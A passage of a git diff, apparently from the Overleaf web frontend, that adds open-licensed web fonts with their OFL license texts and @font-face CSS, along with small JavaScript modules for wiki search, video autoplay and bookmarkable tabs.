0000000..eaff027 Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-Regular.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-SemiBold.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-SemiBold.woff2 new file mode 100644 index 0000000..89236c6 Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-SemiBold.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-SemiBoldItalic.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-SemiBoldItalic.woff2 new file mode 100644 index 0000000..b7792cd Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-SemiBoldItalic.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/OFL.txt b/services/web/frontend/fonts/noto-sans/OFL.txt new file mode 100644 index 0000000..6843f31 --- /dev/null +++ b/services/web/frontend/fonts/noto-sans/OFL.txt @@ -0,0 +1,93 @@ +Copyright 2022 The Noto Project Authors (https://github.com/notofonts/latin-greek-cyrillic) + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +https://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/noto-sans/noto-sans.css b/services/web/frontend/fonts/noto-sans/noto-sans.css new file mode 100644 index 0000000..6e96515 --- /dev/null +++ b/services/web/frontend/fonts/noto-sans/noto-sans.css @@ -0,0 +1,50 @@ +/* Noto Sans - Regular */ +@font-face { + font-family: 'Noto Sans'; + font-style: normal; + font-weight: 400; + font-display: fallback; + src: url('NotoSans-Regular.woff2') format('woff2'); +} + +@font-face { + font-family: 'Noto Sans'; + font-style: italic; + font-weight: 400; + font-display: fallback; + src: url('NotoSans-Italic.woff2') format('woff2'); +} + +/* Noto Sans - Medium */ +@font-face { + font-family: 'Noto Sans'; + font-style: normal; + font-weight: 500; + font-display: fallback; + src: url('NotoSans-Medium.woff2') format('woff2'); +} + +@font-face { + font-family: 'Noto Sans'; + font-style: italic; + font-weight: 500; + font-display: fallback; + src: url('NotoSans-MediumItalic.woff2') format('woff2'); +} + +/* Noto Sans - SemiBold */ +@font-face { + font-family: 'Noto Sans'; + font-style: normal; + font-weight: 600; + font-display: fallback; + src: url('NotoSans-SemiBold.woff2') format('woff2'); +} + +@font-face { + font-family: 'Noto Sans'; + font-style: italic; + font-weight: 600; + font-display: fallback; + src: url('NotoSans-SemiBoldItalic.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/noto-serif/NotoSerif-Italic[wght].woff2 b/services/web/frontend/fonts/noto-serif/NotoSerif-Italic[wght].woff2 new file mode 100644 index 0000000..dd6e397 Binary files /dev/null and b/services/web/frontend/fonts/noto-serif/NotoSerif-Italic[wght].woff2 differ diff --git a/services/web/frontend/fonts/noto-serif/NotoSerif[wght].woff2 b/services/web/frontend/fonts/noto-serif/NotoSerif[wght].woff2 new file mode 100644 index 0000000..fec5455 Binary files /dev/null and b/services/web/frontend/fonts/noto-serif/NotoSerif[wght].woff2 differ diff --git a/services/web/frontend/fonts/noto-serif/OFL.txt b/services/web/frontend/fonts/noto-serif/OFL.txt new file mode 100644 index 0000000..6843f31 --- /dev/null +++ b/services/web/frontend/fonts/noto-serif/OFL.txt @@ -0,0 +1,93 @@ +Copyright 2022 The Noto Project Authors (https://github.com/notofonts/latin-greek-cyrillic) + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +https://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/noto-serif/noto-serif.css b/services/web/frontend/fonts/noto-serif/noto-serif.css new file mode 100644 index 0000000..316697f --- /dev/null +++ b/services/web/frontend/fonts/noto-serif/noto-serif.css @@ -0,0 +1,15 @@ +@font-face { + font-family: 'Noto Serif'; + font-style: normal; + font-weight: 200 700; + font-stretch: 62.5% 100%; + src: url('NotoSerif[wght].woff2') format('woff2'); +} + +@font-face { + font-family: 'Noto Serif'; + font-style: italic; + font-weight: 200 700; + font-stretch: 62.5% 100%; + src: url('NotoSerif-Italic[wght].woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/open-dyslexic-mono/OFL.txt b/services/web/frontend/fonts/open-dyslexic-mono/OFL.txt new file mode 100644 index 0000000..bb86782 --- /dev/null +++ b/services/web/frontend/fonts/open-dyslexic-mono/OFL.txt @@ -0,0 +1,94 @@ +Copyright (c) 2019-07-29, Abbie Gonzalez (https://abbiecod.es|support@abbiecod.es), +with Reserved Font Name OpenDyslexic. +Copyright (c) 12/2012 - 2019 +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/open-dyslexic-mono/OpenDyslexicMono-Regular.woff2 b/services/web/frontend/fonts/open-dyslexic-mono/OpenDyslexicMono-Regular.woff2 new file mode 100644 index 0000000..ebb5140 Binary files /dev/null and b/services/web/frontend/fonts/open-dyslexic-mono/OpenDyslexicMono-Regular.woff2 differ diff --git a/services/web/frontend/fonts/open-dyslexic-mono/open-dyslexic-mono.css b/services/web/frontend/fonts/open-dyslexic-mono/open-dyslexic-mono.css new file mode 100644 index 0000000..299ca06 --- /dev/null +++ b/services/web/frontend/fonts/open-dyslexic-mono/open-dyslexic-mono.css @@ -0,0 +1,7 @@ +@font-face { + font-family: 'OpenDyslexic Mono'; + src: url('./OpenDyslexicMono-Regular.woff2') format('woff2'); + font-style: normal; + font-weight: normal; + ascent-override: 100%; +} diff --git a/services/web/frontend/fonts/open-sans/OFL.txt b/services/web/frontend/fonts/open-sans/OFL.txt new file mode 100644 index 0000000..2e76eef --- /dev/null +++ b/services/web/frontend/fonts/open-sans/OFL.txt @@ -0,0 +1,88 @@ +Copyright 2020 The Open Sans Project Authors (https://github.com/googlefonts/opensans) + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font +creation efforts of academic and linguistic communities, and to +provide a free and open framework in which fonts may be shared and +improved in partnership with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply to +any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software +components as distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, +deleting, or substituting -- in part or in whole -- any of the +components of the Original Version, by changing formats or by porting +the Font Software to a new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, +modify, redistribute, and sell modified and unmodified copies of the +Font Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, in +Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the +corresponding Copyright Holder. This restriction only applies to the +primary font name as presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created using +the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/open-sans/OpenSans-Bold.woff2 b/services/web/frontend/fonts/open-sans/OpenSans-Bold.woff2 new file mode 100644 index 0000000..6d6a299 Binary files /dev/null and b/services/web/frontend/fonts/open-sans/OpenSans-Bold.woff2 differ diff --git a/services/web/frontend/fonts/open-sans/OpenSans-Light.woff2 b/services/web/frontend/fonts/open-sans/OpenSans-Light.woff2 new file mode 100644 index 0000000..2f5ee39 Binary files /dev/null and b/services/web/frontend/fonts/open-sans/OpenSans-Light.woff2 differ diff --git a/services/web/frontend/fonts/open-sans/OpenSans-Regular.woff2 b/services/web/frontend/fonts/open-sans/OpenSans-Regular.woff2 new file mode 100644 index 0000000..23eec57 Binary files /dev/null and b/services/web/frontend/fonts/open-sans/OpenSans-Regular.woff2 differ diff --git a/services/web/frontend/fonts/open-sans/OpenSans-SemiBold.woff2 b/services/web/frontend/fonts/open-sans/OpenSans-SemiBold.woff2 new file mode 100644 index 0000000..13b0ac0 Binary files /dev/null and b/services/web/frontend/fonts/open-sans/OpenSans-SemiBold.woff2 differ diff --git a/services/web/frontend/fonts/open-sans/open-sans.css b/services/web/frontend/fonts/open-sans/open-sans.css new file mode 100644 index 0000000..8b1b52c --- /dev/null +++ b/services/web/frontend/fonts/open-sans/open-sans.css @@ -0,0 +1,24 @@ +@font-face { + font-family: 'Open Sans'; + font-style: normal; + font-weight: 300; + src: url('OpenSans-Light.woff2') format('woff2'); +} +@font-face { + font-family: 'Open Sans'; + font-style: normal; + font-weight: 400; + src: url('OpenSans-Regular.woff2') format('woff2'); +} +@font-face { + font-family: 'Open Sans'; + font-style: normal; + font-weight: 600; + src: url('OpenSans-SemiBold.woff2') format('woff2'); +} +@font-face { + font-family: 'Open Sans'; + font-style: normal; + font-weight: 700; + src: url('OpenSans-Bold.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/source-code-pro/LICENSE.md b/services/web/frontend/fonts/source-code-pro/LICENSE.md new file mode 100644 index 0000000..70288a8 --- /dev/null +++ b/services/web/frontend/fonts/source-code-pro/LICENSE.md @@ -0,0 +1,93 @@ +© 2023 Adobe (http://www.adobe.com/), with Reserved Font Name 'Source'. All Rights Reserved. Source is a trademark of Adobe in the United States and/or other countries. + +This Font Software is licensed under the SIL Open Font License, Version 1.1. + +This license is copied below, and is also available with a FAQ at: http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/source-code-pro/SourceCodePro-Regular.ttf.woff2 b/services/web/frontend/fonts/source-code-pro/SourceCodePro-Regular.ttf.woff2 new file mode 100644 index 0000000..40826f1 Binary files /dev/null and b/services/web/frontend/fonts/source-code-pro/SourceCodePro-Regular.ttf.woff2 differ diff --git a/services/web/frontend/fonts/source-code-pro/source-code-pro.css b/services/web/frontend/fonts/source-code-pro/source-code-pro.css new file mode 100644 index 0000000..f7e3cea --- /dev/null +++ b/services/web/frontend/fonts/source-code-pro/source-code-pro.css @@ -0,0 +1,6 @@ +@font-face { + font-family: 'Source Code Pro'; + font-style: normal; + font-weight: 400; + src: url('SourceCodePro-Regular.ttf.woff2') format('woff2'); +} diff --git a/services/web/frontend/js/bootstrap-3.ts b/services/web/frontend/js/bootstrap-3.ts new file mode 100644 index 0000000..2c7b3b8 --- /dev/null +++ b/services/web/frontend/js/bootstrap-3.ts @@ -0,0 +1,4 @@ +import 'bootstrap' +import './features/contact-form' +import './features/bookmarkable-tab/index' +import './features/tooltip/index-bs3' diff --git a/services/web/frontend/js/bootstrap-5.ts b/services/web/frontend/js/bootstrap-5.ts new file mode 100644 index 0000000..b9dc3d8 --- /dev/null +++ b/services/web/frontend/js/bootstrap-5.ts @@ -0,0 +1,3 @@ +import './features/bookmarkable-tab/index-bs5' +import './features/tooltip/index-bs5' +import 'bootstrap-5' diff --git a/services/web/frontend/js/dev-toolbar.ts b/services/web/frontend/js/dev-toolbar.ts new file mode 100644 index 0000000..f973c97 --- /dev/null +++ b/services/web/frontend/js/dev-toolbar.ts @@ -0,0 +1,5 @@ +import importOverleafModules from '../macros/import-overleaf-module.macro' + +if (process.env.NODE_ENV === 'development') { + importOverleafModules('devToolbar') +} diff --git a/services/web/frontend/js/features/algolia-search/search-wiki.js b/services/web/frontend/js/features/algolia-search/search-wiki.js new file mode 100644 index 0000000..9e2a50a --- /dev/null +++ b/services/web/frontend/js/features/algolia-search/search-wiki.js @@ -0,0 +1,43 @@ +import _ from 'lodash' +import AlgoliaSearch from 'algoliasearch' +import getMeta from '../../utils/meta' + +let wikiIdx +export async function searchWiki(...args) { + if (!wikiIdx) { + const algoliaConfig = getMeta('ol-algolia') + const wikiIndex = _.get(algoliaConfig, 'indexes.wiki') + if (wikiIndex) { + const client = AlgoliaSearch(algoliaConfig.appId, algoliaConfig.apiKey) + wikiIdx = client.initIndex(wikiIndex) + } + } + if (!wikiIdx) { + return { hits: [], nbHits: 0, nbPages: 0 } + } + return wikiIdx.search(...args) +} + +export function formatWikiHit(hit) { + const pageUnderscored = hit.pageName.replace(/\s/g, '_') + const pageSlug = encodeURIComponent(pageUnderscored) + const pagePath = hit.kb ? 'how-to' : 'latex' + + let pageAnchor = '' + const rawPageName = hit._highlightResult.pageName.value + const sectionName = hit.sectionName + let pageName = rawPageName + if (sectionName) { + pageAnchor = `#${sectionName.replace(/\s/g, '_')}` + pageName += ' - ' + sectionName + } + + const body = hit._highlightResult.content.value + const content = body + .split('\n') + .filter(line => line.includes('') && !line.includes('[edit]')) + .join('\n...\n') + + const url = `/learn/${pagePath}/${pageSlug}${pageAnchor}` + return { url, pageName, rawPageName, sectionName, content } +} diff --git a/services/web/frontend/js/features/autoplay-video/index.js b/services/web/frontend/js/features/autoplay-video/index.js new file mode 100644 index 0000000..d706f90 --- /dev/null +++ b/services/web/frontend/js/features/autoplay-video/index.js @@ -0,0 +1,56 @@ +function setup(videoEl) { + const reducedMotionReduce = window.matchMedia( + '(prefers-reduced-motion: reduce)' + ) + + if (reducedMotionReduce.matches) { + // TODO: on firefox, if user enters this mode, video can throw error + // in console, if user seeks the control seek bar relatively fast + // AbortError: The fetching process for the media resource was aborted by the user agent at the user's request. + // this is only a problem in firefox (tested in macOS), chrome and safari is fine + videoEl.setAttribute('controls', '') + + return + } + + const DELAY_BEFORE_REPLAY = 15 * 1000 + // 0.7 will enable the autoplay on the desktop main homepage video for all users + const INTERSECTION_THRESHOLD = 0.7 + + let videoIsVisible + + videoEl.addEventListener('ended', () => { + setTimeout(() => { + videoEl.currentTime = 0 + if (videoIsVisible) { + videoEl.play() + } + }, DELAY_BEFORE_REPLAY) + }) + + const observer = new IntersectionObserver( + function onIntersecting(changes) { + for (const change of changes) { + if (change.isIntersecting) { + videoIsVisible = true + if (videoEl.readyState >= videoEl.HAVE_FUTURE_DATA) { + if (!videoEl.ended) { + videoEl.play() + } + } else { + videoEl.play() + } + } else { + videoIsVisible = false + } + } + }, + { + threshold: INTERSECTION_THRESHOLD, + } + ) + + observer.observe(videoEl) +} + +document.querySelectorAll('[data-ol-autoplay-video]').forEach(setup) diff --git a/services/web/frontend/js/features/bookmarkable-tab/index-bs5.ts b/services/web/frontend/js/features/bookmarkable-tab/index-bs5.ts new file mode 100644 index 0000000..51f4392 --- /dev/null +++ b/services/web/frontend/js/features/bookmarkable-tab/index-bs5.ts @@ -0,0 +1,30 @@ +import { Tab } from 'bootstrap-5' + +function bookmarkableTab(tabEl: HTMLElement) { + tabEl.addEventListener('click', () => { + window.location.hash = tabEl.getAttribute('href') as string + }) +} + +function handleHashChange() { + const hash = window.location.hash + if (!hash) return + + // Find the bookmarkable tab that links to the hash + const tabEl = document.querySelector( + `[data-ol-bookmarkable-tab][href="${hash}"]` + ) + + if (!tabEl) return + + // Select the tab via Bootstrap 5 + const tab = new Tab(tabEl) + tab.show() +} + +document + .querySelectorAll('[data-ol-bookmarkable-tab]') + .forEach(tabEl => bookmarkableTab(tabEl as HTMLElement)) + +window.addEventListener('hashchange', handleHashChange) +handleHashChange() diff --git a/services/web/frontend/js/features/bookmarkable-tab/index.js b/services/web/frontend/js/features/bookmarkable-tab/index.js new file mode 100644 index 0000000..76855e9 --- /dev/null +++ b/services/web/frontend/js/features/bookmarkable-tab/index.js @@ -0,0 +1,21 @@ +function bookmarkableTab(tabEl) { + tabEl.addEventListener('click', () => { + window.location.hash = tabEl.getAttribute('href') + }) +} + +function handleHashChange() { + const hash = window.location.hash + if (!hash) return + + // Find the bookmarkable tab that links to the hash + const $tabEl = $(`[data-ol-bookmarkable-tab][href="${hash}"]`) + if (!$tabEl) return + + // Select the tab via Bootstrap + $tabEl.tab('show') +} + 